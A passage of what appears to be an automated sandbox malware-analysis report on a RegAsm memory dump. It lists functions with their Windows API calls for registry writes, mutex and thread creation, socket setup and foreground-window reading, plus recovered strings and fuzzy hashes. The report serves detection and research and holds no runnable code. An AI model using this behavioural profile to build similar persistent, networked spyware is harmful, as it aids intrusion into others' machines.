              • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
              • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
              Strings
              • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Create$EventLocalThreadTime
              • String ID: KeepAlive | Enabled | Timeout:
              • API String ID: 2532271599-1507639952
              • Opcode ID: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
              • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
              • Opcode Fuzzy Hash: 560c203c767acd10f1bafe677f0d9cbc016093e56ac0604e807a07335adf4d88
              • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
              Function 0041376F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
              Download Yara Rule
              APIs
              • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
              • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
              • RegCloseKey.KERNEL32(?), ref: 004137B1
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateValue
              • String ID: pth_unenc
              • API String ID: 1818849710-4028850238
              • Opcode ID: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
              • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
              • Opcode Fuzzy Hash: 4f15aeb283403f146db3f09acdab1127f952c22a8adcae04a958ae624d8eac3f
              • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
              Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
              Download Yara Rule
              APIs
              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
              • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
              • CloseHandle.KERNEL32(?), ref: 00404DDB
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Create$CloseEventHandleObjectSingleThreadWait
              • String ID:
              • API String ID: 3360349984-0
              • Opcode ID: 86f3e289ee87dd2070e95c4c7186b2520882cd19ee190badebe9b582a3aec49f
              • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
              • Opcode Fuzzy Hash: 86f3e289ee87dd2070e95c4c7186b2520882cd19ee190badebe9b582a3aec49f
              • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
              Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
              • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID:
              • API String ID: 3177248105-0
              • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
              • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
              • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
              • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
              Function 0040D069 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
              Download Yara Rule
              APIs
              • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
              • GetLastError.KERNEL32 ref: 0040D083
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CreateErrorLastMutex
              • String ID: SG
              • API String ID: 1925916568-3189917014
              • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
              • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
              • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
              • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
              Function 004135A6 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
              • RegQueryValueExA.KERNEL32 ref: 004135E7
              • RegCloseKey.KERNEL32(?), ref: 004135F2
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID:
              • API String ID: 3677997916-0
              • Opcode ID: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
              • Instruction ID: 357f89d7cd1c8cc036c5e31f86fe90e90b696c4569df010e686479b524d11f87
              • Opcode Fuzzy Hash: 047bda59581c7e78827521e08e68fdf793dfebd6250409dd5ae19ad748ced965
              • Instruction Fuzzy Hash: 5A01D676900228BBCF209B91DC09DEF7FBDDB84751F000066BB09E2240DA748E45DBA4
              Function 004136F8 Relevance: 4.5, APIs: 3, Instructions: 42registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 00413714
              • RegQueryValueExA.KERNEL32 ref: 0041372D
              • RegCloseKey.KERNEL32(00000000), ref: 00413738
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID:
              • API String ID: 3677997916-0
              • Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
              • Instruction ID: 3f277cad741e4f631881634228dfc272d65c1146f3ef4f3c344e6cfa7cb73972
              • Opcode Fuzzy Hash: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
              • Instruction Fuzzy Hash: 1C018BB1400229FBDF216FA1DC04DEB3F38EF05751F004065BE08621A1D6358AA5DBA4
              Function 00413549 Relevance: 4.5, APIs: 3, Instructions: 37registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
              • RegQueryValueExA.KERNEL32 ref: 00413587
              • RegCloseKey.KERNEL32(?), ref: 00413592
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID:
              • API String ID: 3677997916-0
              • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
              • Instruction ID: df0ca7b2621da3f23a966dc0a7f3323316399916f3769291e5945d4ebcba47cd
              • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
              • Instruction Fuzzy Hash: E8F01776900218FFDF109FA0DC05FEEBBBCEB04B11F1040A6BA09E6191E2359F54AB94
              Function 004134FF Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
              Download Yara Rule
              APIs
              • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413516
              • RegQueryValueExA.KERNEL32 ref: 0041352A
              • RegCloseKey.KERNEL32(?), ref: 00413535
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseOpenQueryValue
              • String ID:
              • API String ID: 3677997916-0
              • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
              • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
              • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
              • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
              Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
              Download Yara Rule
              APIs
              • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
              • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
              • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CloseCreateValue
              • String ID:
              • API String ID: 1818849710-0
              • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
              • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
              • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
              • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
              Function 0044EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
              Download Yara Rule
              APIs
              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Info
              • String ID:
              • API String ID: 1807457897-3916222277
              • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
              • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
              • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
              • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
              Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _wcslen
              • String ID: pQG
              • API String ID: 176396367-3769108836
              • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
              • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
              • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
              • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
              Function 00448BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: String
              • String ID: LCMapStringEx
              • API String ID: 2568140703-3893581201
              • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
              • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
              • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
              • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
              Function 00448A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
              Strings
              • InitializeCriticalSectionEx, xrefs: 00448A9F
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CountCriticalInitializeSectionSpin
              • String ID: InitializeCriticalSectionEx
              • API String ID: 2593887523-3084827643
              • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
              • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
              • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
              • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
              Function 00448710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Alloc
              • String ID: FlsAlloc
              • API String ID: 2773662609-671089009
              • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
              • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
              • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
              • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
              Function 00438D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
              Download Yara Rule
              APIs
              • try_get_function.LIBVCRUNTIME ref: 00438DA9
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: try_get_function
              • String ID: FlsAlloc
              • API String ID: 2742660187-671089009
              • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
              • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
              • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
              • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
              Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
              Download Yara Rule
              APIs
              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: GlobalMemoryStatus
              • String ID: @
              • API String ID: 1890195054-2766056989
              • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
              • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
              • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
              • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
              Function 0044F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
              • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CodeInfoPageValid
              • String ID:
              • API String ID: 546120528-0
              • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
              • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
              • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
              • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
              Function 0044EF58 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
              • _free.LIBCMT ref: 0044EFD0
              • _free.LIBCMT ref: 0044F006
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorLast_abort
              • String ID:
              • API String ID: 2991157371-0
              • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
              • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
              • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
              • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
              Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: AddressProc__crt_fast_encode_pointer
              • String ID:
              • API String ID: 2279764990-0
              • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
              • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
              • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
              • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
              Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
              Download Yara Rule
              APIs
              • socket.WS2_32(?,00000001,00000006), ref: 00404852
              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: CreateEventStartupsocket
              • String ID:
              • API String ID: 1953588214-0
              • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
              • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
              • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
              • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
              Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
              • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
              • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
              • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
              Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Window$ForegroundText
              • String ID:
              • API String ID: 29597999-0
              • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
              • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
              • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
              • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
              Function 00414EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
              Download Yara Rule
              APIs
              • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
              • WSASetLastError.WS2_32(00000000), ref: 00414F10
                • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
              • String ID:
              • API String ID: 1170566393-0
              • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
              • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
              • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
              • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
              Function 0043A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
              • String ID:
              • API String ID: 806969131-0
              • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
              • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
              • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
              • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
              Function 0043AA1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000011.00000002.1077978379.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
              Yara matches
              Similarity
